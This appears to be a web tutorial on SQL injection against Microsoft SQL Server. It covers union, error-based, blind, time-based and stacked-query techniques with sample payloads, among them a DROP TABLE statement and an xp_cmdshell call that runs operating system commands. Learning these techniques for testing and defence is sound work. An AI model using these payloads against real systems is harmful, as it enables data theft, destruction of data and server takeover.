Microsoft SQL Server

Context

This guide is designed to teach specific SQL injection techniques on Microsoft SQL Server. It assumes that the reader has a working knowledge of SQL language, database schema, HTTP requests, and general SQL injection methods.

Theory

Microsoft SQL Server Default Databases

Microsoft SQL Server comes with several default databases, such as master, model, msdb, tempdb, and northwind. These default databases can often reveal sensitive information if they are improperly secured. They contain system-wide configuration settings and metadata about all other databases on the server, which could be leveraged for further exploitation.

SQL Comment Syntax in MSSQL

In Microsoft SQL Server, the comment syntax allows you to manage the execution flow of SQL statements. Single-line comments are denoted by --, and multi-line comments are enclosed within /* */. Attackers can use comments to bypass query logic or terminate queries early to manipulate the SQL execution path for injection purposes.

Enumeration Techniques in MSSQL

Enumeration in MSSQL involves gathering information about the database structure and metadata. This is typically done using built-in functions and system tables. Functions like DB_NAME() and SCHEMA_NAME(), along with system tables such as information_schema.tables, facilitate the enumeration of databases and their structure. Understanding the schema and tables is crucial for exploiting SQL injection vulnerabilities further.

Version and Server Property Enumeration

Enumerating version and server properties is an important step in planning attacks, as it provides insights into potential vulnerabilities based on the server version and configuration. Microsoft SQL Server provides functions such as @@version and SERVERPROPERTY() to retrieve version information and server properties; this helps attackers tailor their exploits accordingly.

String Aggregation and Object Identification

Functions like STRING_AGG() and OBJECT_ID() are used in data retrieval and object identification. STRING_AGG() is useful for concatenating query results into a single string, which can be helpful in blind SQL injection attacks, while OBJECT_ID() allows attackers to confirm the existence of a particular database object.

Practice

Union-Based SQL Injection

Union-based SQL injection exploits vulnerabilities by appending additional SELECT queries using the UNION SQL operator. It enables attackers to retrieve data from other tables where data types match.

  • Command:

    SELECT column1, column2 FROM table UNION SELECT NULL, @@version --
    

    This retrieves the SQL Server version using the UNION operator.

  • Command:

    SELECT column1, column2 FROM table UNION SELECT NULL, DB_NAME() --
    

    This command is used to enumerate the current database name.

Outcome: Successful execution provides access to the database version and names, aiding mapping of the database environment.

Error-Based SQL Injection

Error-based SQL injection uses SQL errors to gather database information.

  • Command:

    SELECT 1/0 FROM table --
    

    This triggers an error that may reveal database configuration information.

  • Command:

    SELECT CAST((SELECT @@version) AS INT) --
    

    Forces a data type conversion error to display the SQL Server version.

Outcome: Database errors reveal sensitive system information to the attacker.

Blind SQL Injection

Blind SQL injection relies on evaluating conditions that can infer the database structure based on True/False outcomes.

  • Command:

    SELECT CASE WHEN (SELECT COUNT(*) FROM information_schema.tables) > 0 THEN 1 ELSE 1/0 END --
    

    Illicitly determines the number of tables in the database.

  • Command:

    SELECT CASE WHEN (SELECT SYSTEM_USER) = 'sa' THEN 1 ELSE 1/0 END --
    

    Checks if the current user is the 'sa' account using logical conditions.

Outcome: Provides an inferential method for accessing database structure and user information.

Time-Based Blind SQL Injection

Time-based techniques introduce delays to ascertain responses without visible output.

  • Command:

    WAITFOR DELAY '00:00:05' --
    

    Introduces a delay, affecting operation timing as an inference channel.

  • Command:

    IF (SELECT SYSTEM_USER) = 'sa' WAITFOR DELAY '00:00:05' --
    

    Tests user roles by triggering time delays based on conditions.

Outcome: Deduces information about user roles and database states using time-based inference.

Stacked Query Injection

Stacked queries exploit the ability to execute multiple SQL statements in one execution by separating them with a semicolon.

  • Command:

    SELECT 1; DROP TABLE test --
    

    Allows execution of additional commands, such as dropping a table.

  • Command:

    SELECT 1; EXEC xp_cmdshell 'dir' --
    

    Executes operating system commands through SQL Server extensions like xp_cmdshell.

Outcome: Enables arbitrary SQL and operating system command execution, escalating from database to server-level attacks.

Tools

  • sqlmap
  • Burp Suite
  • Nmap

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.